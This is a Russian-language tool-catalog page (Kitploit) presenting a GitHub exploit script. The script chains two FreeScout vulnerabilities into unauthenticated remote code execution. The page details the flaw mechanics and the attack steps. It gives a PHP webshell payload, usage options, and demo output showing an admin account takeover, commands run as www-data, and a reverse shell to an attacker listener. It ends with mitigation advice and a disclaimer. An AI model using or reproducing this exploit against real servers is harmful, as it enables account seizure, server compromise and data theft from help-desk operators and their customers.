Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-53595_exploit — Эксплойт-скрипт, объединяющий CVE-2026-53595 (анонимный захват учётной записи) и CVE-2026-53593 (загрузка .pht) для неаутентифицированного удалённого выполнения кода в программном обеспечении службы поддержки FreeScout. | Kitploit
Инструменты/GitHubGitHub/0xdak/cve-2026-53595_exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHub0xdak/cve-2026-53595_exploit

CVE-2026-53595_exploit

Эксплойт-скрипт, объединяющий CVE-2026-53595 (анонимный захват учётной записи) и CVE-2026-53593 (загрузка .pht) для неаутентифицированного удалённого выполнения кода в программном обеспечении службы поддержки FreeScout.

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-53595 (+ CVE-2026-53593) — FreeScout Anonymous ATO → RCE

Неаутентифицированное удалённое выполнение кода в FreeScout ≤ 1.8.223 (help desk на Laravel) путём связывания двух уязвимостей, обе исправлены в 1.8.224:

  • CVE-2026-53595 — анонимный захват учётной записи. POST /user-setup/{hash}/{invite_sent_at} выбирает учётную запись только по столбцу invite_hash. У активированного пользователя invite_hash = '', а в MySQL/MariaDB сравнение VARCHAR игнорирует конечные пробелы, поэтому hash = %20 соответствует администратору. Проверка срока действия invite_sent_at расшифровывает значение, используя пароль пользователя как ключ, но вспомогательная функция расшифровки возвращает исходные данные при сбое (пустой блок catch), поэтому принимается обычная текущая unix-метка времени. Затем конечная точка перезаписывает email и пароль учётной записи и выполняет вход.
  • CVE-2026-53593 — аутентифицированная загрузка .pht. Список запрещённых расширений (php.*|sh|pl|phtml|phar) не покрывает .pht, которые Apache mod_php выполняет как PHP.
  • Связав их, неаутентифицированный злоумышленник получает возможность выполнения кода от имени пользователя веб-сервера (www-data).

    Что делает

    1. GET /user-setup/%20/<unix_ts> для получения cookie сессии и CSRF-токена.
    2. POST на тот же URL, чтобы перезаписать email/пароль администратора и войти (ATO).
    3. POST /uploads/upload файла shell.pht (<?php system($_GET['c']); ?>).
    4. Выполняет команду через веб-шелл или открывает обратную оболочку (reverse shell).

    Использование

    root@kitploit:~
    ./exploit.sh -t <target> [options]
       -t, --target URL     target base URL (e.g. http://10.10.10.10)   [required]
       -c, --cmd CMD        run a single command (default: id)
           --lhost IP       reverse shell: attacker IP (start nc first)
           --lport PORT     reverse shell port (default 4444)
           --email ADDR     email to set on the seized admin (default [email protected])
           --password PASS  password to set (default Pwned12345)
       -h, --help
    

    Демонстрация

    root@kitploit:~
    $ ./exploit.sh -t http://10.10.10.10
    [*] fetching setup form (hash=%20, ts=1784500000) ...
    [*] seizing admin -> [email protected] / Pwned12345 ...
    [+] admin account taken over (you can also log in at http://10.10.10.10/login)
    [*] uploading .pht webshell ...
    [+] webshell: http://10.10.10.10/storage/uploads/p2Bj81XDu6DbBJ4Sq5mYW05zY.pht
    [+] id -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    $ ./exploit.sh -t http://10.10.10.10 -c 'cat /var/www/local.txt'
    ...
    [+] cat /var/www/local.txt -> f1a7c30e9b6d24851e6d24851f1a7c30
    
    # reverse shell (run `nc -lvnp 4444` first)
    $ ./exploit.sh -t http://10.10.10.10 --lhost 10.10.14.7 --lport 4444
    [+] admin account taken over ...
    [+] webshell: http://10.10.10.10/storage/uploads/....pht
    [*] sending reverse shell to 10.10.14.7:4444 ...
    [+] payload sent — check your listener.
    

    Требования

    • bash, curl, jq

    Примечания

    • Работает на FreeScout 1.0.x – 1.8.223; в 1.8.224+ обе ошибки исправлены (302 означает неудачный захват).
    • RCE происходит под пользователем www-data (пользователь Apache). Выполнение .pht зависит от того, обрабатывает ли сервер .pht через mod_php — «стандартное окружение Apache + libapache2-mod-php», на которое нацелена CVE.
    • Обратная оболочка кодируется в base64 перед отправкой в веб-шелл: system() выполняется через /bin/sh (dash в Debian/Ubuntu), который не понимает перенаправление >& /dev/tcp/..., доступное только в bash; base64 также позволяет избежать всех проблем с экранированием кавычек.
    • В пароле по умолчанию намеренно нет ! — ! запускает подстановку из истории в интерактивных bash/zsh и ломает вставляемые команды.

    Устранение

    • Обновитесь до FreeScout 1.8.224+.
    • Никогда не используйте сравнение VARCHAR для токенов безопасности (коллизии из-за конечных пробелов) и не считайте неудачную расшифровку валидным значением — отклоняйте пустые/некорректные токены.
    • Используйте белый список расширений для загрузки, храните загруженные файлы вне веб-корня и отдавайте их через обработчик, который никогда их не выполняет.

    Отказ от ответственности

    Только для авторизованного тестирования безопасности и образовательных целей. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несёт ответственности за неправомерное использование.

    Скачать инструмент